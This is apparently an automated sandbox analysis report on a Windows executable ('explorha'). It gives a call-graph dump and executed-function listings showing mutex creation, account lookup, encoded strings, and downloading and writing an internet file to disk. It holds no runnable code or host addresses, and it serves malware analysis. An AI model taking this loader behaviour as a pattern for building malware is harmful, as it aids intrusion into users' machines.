___scrt_is_nonwritable_in_current_image CallUnexpected 34291->34292 34299 89bf87 34292->34299 34294 89bf0a 34294->34288 34295->34282 34296->34290 34297->34290 34298->34290 34303 89bfaa ___scrt_uninitialize_crt 34299->34303 34301 89c00b 34309 89c415 RtlAllocateHeap __dosmaperr 34301->34309 34304 89bff0 ___scrt_uninitialize_crt __wsopen_s 34303->34304 34305 89ee4f 34303->34305 34304->34294 34308 89ee5c Hash __dosmaperr 34305->34308 34306 89ee87 RtlAllocateHeap 34307 89ee9a __dosmaperr 34306->34307 34306->34308 34307->34301 34308->34306 34308->34307 34309->34304 34324 869ee8 GetFileAttributesA 34325 869ef8 ListArray 34324->34325 34326 86a40f 34325->34326 34327 869fc3 ListArray 34325->34327 34328 86a414 34326->34328 34329 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 34326->34329 34332 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34327->34332 34330 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 34328->34330 34329->34328 34331 86a419 34330->34331 34333 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 34331->34333 34334 86a3d3 34332->34334 34335 86a41e 34333->34335 34336 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 34335->34336 34337 86a423 Sleep CreateMutexA 34336->34337 34339 86a45e 34337->34339 34340 86a466 34339->34340 34343 897cb9 GetPEB GetPEB RtlAllocateHeap CallUnexpected 34339->34343 34342 86a46e 34343->34342 34358 87edf7 34359 87ee03 ___scrt_is_nonwritable_in_current_image 34358->34359 34379 87eb1d 34359->34379 34361 87ef63 ___scrt_fastfail 34400 897cb9 GetPEB GetPEB RtlAllocateHeap CallUnexpected 34361->34400 34363 87ef70 34401 897c7d GetPEB GetPEB RtlAllocateHeap CallUnexpected 34363->34401 34365 87ef78 ___security_init_cookie 34367 87ef7e __scrt_common_main_seh 34365->34367 34366 87ee53 34368 87eed4 34383 89abdd 34368->34383 34370 87ee0a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 34370->34361 34370->34366 34370->34368 34399 897c93 10 API calls 5 library calls 34370->34399 34372 87eeda 34387 878360 34372->34387 34380 87eb26 34379->34380 34382 87eb3b ___scrt_uninitialize_crt 34380->34382 34402 89b04a 34380->34402 34382->34370 34384 89abe6 34383->34384 34386 89abeb 34383->34386 34433 89a941 GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap 34384->34433 34386->34372 34434 86a430 Sleep CreateMutexA 34387->34434 34391 878375 34392 86cee0 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 34391->34392 34393 87837a 34392->34393 34394 8750e0 11 API calls 34393->34394 34395 87837f 34394->34395 34396 8750e0 11 API calls 34395->34396 34397 8744b0 11 API calls 34395->34397 34398 8748d0 11 API calls 34395->34398 34396->34395 34397->34395 34398->34395 34399->34368 34400->34363 34401->34365 34405 8a049e 34402->34405 34406 8a04ae 34405->34406 34407 89b059 34405->34407 34406->34407 34409 89da7c 34406->34409 34407->34382 34410 89da88 ___scrt_is_nonwritable_in_current_image CallUnexpected 34409->34410 34415 89d2f5 34410->34415 34412 89da9e 34414 89daa8 34412->34414 34424 89d912 RtlAllocateHeap 34412->34424 34414->34406 34416 89d301 ___scrt_is_nonwritable_in_current_image 34415->34416 34417 89d32b CallUnexpected 34416->34417 34418 89d30a 34416->34418 34422 89d319 34417->34422 34425 89d245 34417->34425 34430 898ba3 RtlAllocateHeap __dosmaperr 34418->34430 34420 89d30f 34431 8982ea RtlAllocateHeap __cftof 34420->34431 34422->34412 34424->34414 34426 89ee4f __dosmaperr RtlAllocateHeap 34425->34426 34427 89d257 __wsopen_s 34426->34427 34432 89c415 RtlAllocateHeap __dosmaperr 34427->34432 34429 89d2b9 34429->34417 34430->34420 34431->34422 34432->34429 34433->34386 34435 86a45e 34434->34435 34436 86a466 34435->34436 34444 897cb9 GetPEB GetPEB RtlAllocateHeap CallUnexpected 34435->34444 34439 86c650 34436->34439 34438 86a46e 34440 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34439->34440 34441 86c6a2 34440->34441 34442 865d40 2 API calls 34441->34442 34443 86c6ad 34442->34443 34444->34438 34459 869675 GetFileAttributesA 34460 869685 ListArray 34459->34460 34461 86a3ec 34460->34461 34464 869750 ListArray 34460->34464 34462 86a423 Sleep CreateMutexA 34461->34462 34463 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 34461->34463 34467 86a45e 34462->34467 34463->34462 34466 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34464->34466 34468 86a3d3 34466->34468 34469 86a466 34467->34469 34472 897cb9 GetPEB GetPEB RtlAllocateHeap CallUnexpected 34467->34472 34471 86a46e 34472->34471 34473 86a152 GetFileAttributesA 34477 86a162 ListArray 34473->34477 34474 86a419 34475 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 34474->34475 34478 86a41e 34475->34478 34476 86a22d ListArray 34480 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34476->34480 34477->34474 34477->34476 34479 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 34478->34479 34481 86a423 Sleep CreateMutexA 34479->34481 34482 86a3d3 34480->34482 34484 86a45e 34481->34484 34485 86a466 34484->34485 34488 897cb9 GetPEB GetPEB RtlAllocateHeap CallUnexpected 34484->34488 34487 86a46e 34488->34487 34517 86b3fc 34518 86b406 Concurrency::details::QuickBitSet::Grow 34517->34518 34537 86b59b ListArray 34517->34537 34519 86b426 CreateFileA 34518->34519 34521 86b463 InternetOpenUrlA InternetReadFile 34519->34521 34520 86b61a __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z ListArray 34523 86b4c7 FindCloseChangeNotification InternetCloseHandle InternetCloseHandle 34521->34523 34524 86b498 34521->34524 34522 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 34525 86b651 34522->34525 34526 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34523->34526 34524->34523 34527 86b4a7 WriteFile InternetReadFile 34524->34527 34528 86b4ea 34526->34528 34527->34523 34527->34524 34529 86b535 ListArray 34528->34529 34531 86b642 34528->34531 34529->34537 34538 8980d4 4 API calls 2 library calls 34529->34538 34532 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 34531->34532 34536 86b562 34532->34536 34533 86b554 34539 8668f0 RtlAllocateHeap RtlAllocateHeap ListArray Concurrency::details::_CancellationTokenState::_RegisterCallback 34533->34539 34535 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 34535->34537 34536->34535 34536->34537 34537->34520 34537->34522 34538->34533 34539->34536 34540 89c273 34545 89c049 34540->34545 34543 89c2b2 34546 89c068 34545->34546 34547 89c07b 34546->34547 34555 89c090 34546->34555 34565 898ba3 RtlAllocateHeap __dosmaperr 34547->34565 34549 89c080 34566 8982ea RtlAllocateHeap __cftof 34549->34566 34551 89c08b 34551->34543 34562 8a30bc 34551->34562 34553 89c261 34571 8982ea RtlAllocateHeap __cftof 34553->34571 34560 89c1b0 34555->34560 34567 8a294b GetPEB GetPEB RtlAllocateHeap __cftof __dosmaperr 34555->34567 34557 89c200 34557->34560 34568 8a294b GetPEB GetPEB RtlAllocateHeap __cftof __dosmaperr 34557->34568 34559 89c21e 34559->34560 34569 8a294b GetPEB GetPEB RtlAllocateHeap __cftof __dosmaperr 34559->34569 34560->34551 34570 898ba3 RtlAllocateHeap __dosmaperr 34560->34570 34572 8a2a81 34562->34572 34564 8a30d7 34564->34543 34565->34549 34566->34551 34567->34557 34568->34559 34569->34560 34570->34553 34571->34551 34575 8a2a8d ___scrt_is_nonwritable_in_current_image 34572->34575 34573 8a2a94 34590 898ba3 RtlAllocateHeap __dosmaperr 34573->34590 34575->34573 34577 8a2abf 34575->34577 34576 8a2a99 34591 8982ea RtlAllocateHeap __cftof 34576->34591 34581 8a304e 34577->34581 34580 8a2aa3 __wsopen_s 34580->34564 34592 89801d 34581->34592 34583 8a3070 34595 897f7d 34583->34595 34586 8a3084 34589 8a30b6 34586->34589 34639 89c415 RtlAllocateHeap __dosmaperr 34586->34639 34589->34580 34590->34576 34591->34580 34593 897f9a __cftof 3 API calls 34592->34593 34594 89802f _unexpected 34593->34594 34594->34583 34640 897ecb 34595->34640 34598 8a30dc 34599 8a30f9 34598->34599 34600 8a310e 34599->34600 34601 8a3127 34599->34601 34663 898b90 RtlAllocateHeap __dosmaperr 34600->34663 34658 89d46b 34601->34658 34604 8a3113 34664 898ba3 RtlAllocateHeap __dosmaperr 34604->34664 34605 8a312c 34606 8a314c 34605->34606 34607 8a3135 34605->34607 34662 8a2d95 CreateFileW 34606->34662 34665 898b90 RtlAllocateHeap __dosmaperr 34607->34665 34611 8a313a 34666 898ba3 RtlAllocateHeap __dosmaperr 34611->34666 34613 8a3202 GetFileType 34614 8a320d 34613->34614 34615 8a3254 34613->34615 34669 898b6d RtlAllocateHeap __dosmaperr 34614->34669 34671 89d3b6 RtlAllocateHeap __dosmaperr __wsopen_s 34615->34671 34616 8a31d7 34668 898b6d RtlAllocateHeap __dosmaperr 34616->34668 34617 8a3185 34617->34613 34617->34616 34667 8a2d95 CreateFileW 34617->34667 34622 8a31ca 34622->34613 34622->34616 34623 8a3275 34625 8a32c1 34623->34625 34672 8a2fa4 4 API calls 2 library calls 34623->34672 34624 8a321b 34624->34604 34670 898ba3 RtlAllocateHeap __dosmaperr 34624->34670 34629 8a32c8 34625->34629 34674 8a2b42 4 API calls 3 library calls 34625->34674 34628 8a32f6 34628->34629 34632 8a3304 34628->34632 34673 89c568 RtlAllocateHeap __dosmaperr __wsopen_s 34629->34673 34635 8a3120 34632->34635 34675 8a2d95 CreateFileW 34632->34675 34634 8a33ab 34634->34635 34676 898b6d RtlAllocateHeap __dosmaperr 34634->34676 34635->34586 34637 8a33c1 34677 89d57e RtlAllocateHeap __dosmaperr __wsopen_s 34637->34677 34639->34589 34641 897ed9 34640->34641 34642 897ef3 34640->34642 34653 89805c RtlAllocateHeap ___free_lconv_mon 34641->34653 34643 897efa 34642->34643 34646 897f19 __fassign 34642->34646 34647 897ee3 34643->34647 34654 898076 RtlAllocateHeap RtlAllocateHeap _unexpected 34643->34654 34649 897f2f __fassign 34646->34649 34657 898076 RtlAllocateHeap RtlAllocateHeap _unexpected 34646->34657 34647->34586 34647->34598 34649->34647 34655 898b6d RtlAllocateHeap __dosmaperr 34649->34655 34651 897f3b 34656 898ba3 RtlAllocateHeap __dosmaperr 34651->34656 34653->34647 34654->34647 34655->34651 34656->34647 34657->34649 34661 89d477 ___scrt_is_nonwritable_in_current_image CallUnexpected 34658->34661 34659 89d245 __wsopen_s RtlAllocateHeap 34660 89d4a8 __wsopen_s 34659->34660 34660->34605 34661->34659 34661->34660 34662->34617 34663->34604 34664->34635 34665->34611 34666->34604 34667->34622 34668->34604 34669->34624 34670->34604 34671->34623 34672->34625 34673->34635 34674->34628 34675->34634 34676->34637 34677->34635 34678 86a01d GetFileAttributesA 34679 86a02d ListArray 34678->34679 34680 86a414 34679->34680 34683 86a0f8 ListArray 34679->34683 34681 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 34680->34681 34682 86a419 34681->34682 34684 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 34682->34684 34685 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34683->34685 34686 86a41e 34684->34686 34687 86a3d3 34685->34687 34688 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 34686->34688 34689 86a423 Sleep CreateMutexA 34688->34689 34691 86a45e 34689->34691 34692 86a466 34691->34692 34695 897cb9 GetPEB GetPEB RtlAllocateHeap CallUnexpected 34691->34695 34694 86a46e 34695->34694 34696 872f7c 34697 872f8d 34696->34697 34700 872fa1 ListArray 34696->34700 34698 873092 34697->34698 34697->34700 34699 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 34698->34699 34704 872fe9 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z ListArray 34699->34704 34701 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34700->34701 34700->34704 34702 872fca 34701->34702 34703 865d40 2 API calls 34702->34703 34705 872fd1 34703->34705 34706 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34705->34706 34707 872fe0 34706->34707 34709 867330 34707->34709 34725 879d10 34709->34725 34711 867371 34712 8799b0 2 API calls 34711->34712 34713 867383 34712->34713 34714 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34713->34714 34715 8673e1 34714->34715 34716 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34715->34716 34717 8673fc 34716->34717 34718 865d40 2 API calls 34717->34718 34719 867403 34718->34719 34720 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 34719->34720 34722 867426 34720->34722 34721 8674d3 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z ListArray 34721->34704 34722->34721 34723 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 34722->34723 34724 867504 34723->34724 34726 879d70 34725->34726 34726->34726 34727 878df0 2 API calls 34726->34727 34728 879d89 34727->34728 34730 879da4 __InternalCxxFrameHandler 34728->34730 34734 87a5d0 2 API calls 4 library calls 34728->34734 34733 879df9 __InternalCxxFrameHandler 34730->34733 34735 87a5d0 2 API calls 4 library calls 34730->34735 34732 879e41 34732->34711 34733->34711 34734->34730 34735->34732 34736 89d6f5 34737 89d898 34736->34737 34739 89d71f 34736->34739 34759 898ba3 RtlAllocateHeap __dosmaperr 34737->34759 34739->34737 34740 89d76a 34739->34740 34749 8a3759 RtlAllocateHeap __cftof __dosmaperr 34740->34749 34742 89d79e 34743 89d883 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z __cftof 34742->34743 34750 8a3785 RtlAllocateHeap __cftof __dosmaperr 34742->34750 34745 89d7b0 34745->34743 34751 8a37b1 34745->34751 34747 89d7c2 34747->34743 34758 8a3fa8 RtlAllocateHeap ___scrt_is_nonwritable_in_current_image CallUnexpected 34747->34758 34749->34742 34750->34745 34752 8a37bd 34751->34752 34753 8a37d2 34751->34753 34760 898ba3 RtlAllocateHeap __dosmaperr 34752->34760 34753->34747 34755 8a37c2 34761 8982ea RtlAllocateHeap __cftof 34755->34761 34757 8a37cd 34757->34747 34758->34743 34759->34743 34760->34755 34761->34757 34762 898377 34763 89837a 34762->34763 34778 89a20f 34763->34778 34765 898386 34766 8983a3 34765->34766 34767 898395 34765->34767 34768 89801d _unexpected GetPEB GetPEB RtlAllocateHeap 34766->34768 34769 8983f9 _unexpected 9 API calls 34767->34769 34770 8983bd 34768->34770 34771 89839f 34769->34771 34772 897f7d _unexpected RtlAllocateHeap RtlAllocateHeap 34770->34772 34773 8983ca 34772->34773 34774 8983d1 34773->34774 34775 8983f9 _unexpected 9 API calls 34773->34775 34776 8983f3 34774->34776 34777 89c415 ___free_lconv_mon RtlAllocateHeap 34774->34777 34775->34774 34777->34776 34779 89a214 CallUnexpected 34778->34779 34783 89a21f CallUnexpected 34779->34783 34784 89ec54 3 API calls 5 library calls 34779->34784 34782 89a252 34785 897c7d GetPEB GetPEB RtlAllocateHeap CallUnexpected 34783->34785 34784->34783 34785->34782

                                                                                                      Executed Functions

                                                                                                      Function 00866160 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2750 866160-8661b9 2824 8661ba call 49f0cae 2750->2824 2825 8661ba call 49f0d1b 2750->2825 2826 8661ba call 49f0cda 2750->2826 2827 8661ba call 49f0cca 2750->2827 2828 8661ba call 49f0cb3 2750->2828 2751 8661bf-866238 LookupAccountNameA call 879090 call 865d40 2757 86623c-86625b call 8621c0 2751->2757 2758 86623a 2751->2758 2761 86628c-866292 2757->2761 2762 86625d-86626c 2757->2762 2758->2757 2763 866295-86629a 2761->2763 2764 866282-866289 call 87ecf8 2762->2764 2765 86626e-86627c 2762->2765 2763->2763 2766 86629c-8662c4 call 879090 call 865d40 2763->2766 2764->2761 2765->2764 2767 8664b7 call 8982fa 2765->2767 2778 8662c6 2766->2778 2779 8662c8-8662e9 call 8621c0 2766->2779 2773 8664bc call 8982fa 2767->2773 2777 8664c1-8664c6 call 8982fa 2773->2777 2778->2779 2784 86631a-86632e 2779->2784 2785 8662eb-8662fa 2779->2785 2790 866334-86633a 2784->2790 2791 8663d8-8663fc 2784->2791 2786 866310-866317 call 87ecf8 2785->2786 2787 8662fc-86630a 2785->2787 2786->2784 2787->2773 2787->2786 2793 866340-86636d call 879090 call 865d40 2790->2793 2794 866400-866405 2791->2794 2808 866371-866398 call 8621c0 2793->2808 2809 86636f 2793->2809 2794->2794 2795 866407-86646c call 879750 * 2 2794->2795 2805 86646e-86647d 2795->2805 2806 866499-8664b6 call 87e681 2795->2806 2810 86648f-866496 call 87ecf8 2805->2810 2811 86647f-86648d 2805->2811 2817 86639a-8663a9 2808->2817 2818 8663c9-8663cc 2808->2818 2809->2808 2810->2806 2811->2777 2811->2810 2820 8663bf-8663c6 call 87ecf8 2817->2820 2821 8663ab-8663b9 2817->2821 2818->2793 2819 8663d2 2818->2819 2819->2791 2820->2818 2821->2767 2821->2820 2824->2751 2825->2751 2826->2751 2827->2751 2828->2751
                                                                                                      APIs
                                                                                                      • LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 00866200
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AccountLookupName
                                                                                                      • String ID: CLTk8G==$ELNk8G==$NrSd6xKm
                                                                                                      • API String ID: 1484870144-3685683383
                                                                                                      • Opcode ID: a658f59b18339a892a15298a4aa158c8a0073f9a14f43e7efa46e7a0239948a5
                                                                                                      • Instruction ID: d747a6f1b245c956711d5dab5f45a20ded26ef506b5ef42fe6c83c7c5e41f092
                                                                                                      • Opcode Fuzzy Hash: a658f59b18339a892a15298a4aa158c8a0073f9a14f43e7efa46e7a0239948a5
                                                                                                      • Instruction Fuzzy Hash: B591A3B1A001189BDB29DB28CC85BDDB779FB45304F4085E9E519D7281EB349AC4CFA9
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0086B3FC Relevance: 34.2, APIs: 16, Strings: 3, Instructions: 971networkfileCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0086B447
                                                                                                      • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0086B47E
                                                                                                      • InternetReadFile.WININET(00000000,00000000,?,?), ref: 0086B48F
                                                                                                      • WriteFile.KERNELBASE(?,00000000,?,?,00000000), ref: 0086B4B2
                                                                                                      • InternetReadFile.WININET(00000000,00000000,?,?), ref: 0086B4BD
                                                                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 0086B4CA
                                                                                                      • InternetCloseHandle.WININET(?), ref: 0086B4D9
                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0086B4DC
                                                                                                      • InternetOpenW.WININET(008BAD34,00000000,00000000,00000000,00000000,DDFB3AB0), ref: 0086B6ED
                                                                                                      • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0086B711
                                                                                                      • HttpOpenRequestA.WININET(?,00000000), ref: 0086B75A
                                                                                                      • HttpSendRequestA.WININET(?,00000000), ref: 0086B81A
                                                                                                      • InternetReadFile.WININET(?,?,000003FF,?), ref: 0086B8CC
                                                                                                      • InternetCloseHandle.WININET(?), ref: 0086B9A7
                                                                                                      • InternetCloseHandle.WININET(?), ref: 0086B9AF
                                                                                                      • InternetCloseHandle.WININET(?), ref: 0086B9B7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
